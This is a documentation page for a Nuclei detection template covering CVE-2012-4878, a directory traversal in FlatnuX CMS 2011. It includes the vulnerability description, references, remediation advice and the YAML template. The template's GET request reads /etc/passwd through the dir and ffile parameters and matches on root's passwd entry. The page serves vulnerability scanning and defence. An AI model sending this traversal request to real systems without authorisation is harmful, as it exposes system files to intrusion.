FlatnuX CMS - Directory Traversal
ID: CVE-2012-4878
Severity: medium
Author: daffainfo
Tags: cve,cve2012,lfi,traversal,edb,packetstorm,flatnux,xss
Description
Section titled “Description”A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
YAML Source
Section titled “YAML Source”id: CVE-2012-4878
info: name: FlatnuX CMS - Directory Traversal author: daffainfo severity: medium description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. impact: | An attacker can read or modify sensitive files on the server, potentially leading to unauthorized accessand data leakage. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FlatnuX CMS. reference: - https://www.exploit-db.com/exploits/37034 - https://nvd.nist.gov/vuln/detail/CVE-2012-4878 - http://www.vulnerability-lab.com/get_content.php?id=487 - http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/74568 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-4878 cwe-id: CWE-22 epss-score: 0.00537 epss-percentile: 0.7717 cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: flatnux product: flatnux tags: cve,cve2012,lfi,traversal,edb,packetstorm,flatnux,xss
http: - method: GET path: - "{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a0047304502205efff99d4a43eeacaaf975a4affb4822ab886b61b125f94e213817a4062fd7680221009a23e4e1bba3bcf11fc5499838f8c28a497df641a877da5d97e948665e41a0e3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2012/CVE-2012-4878.yaml"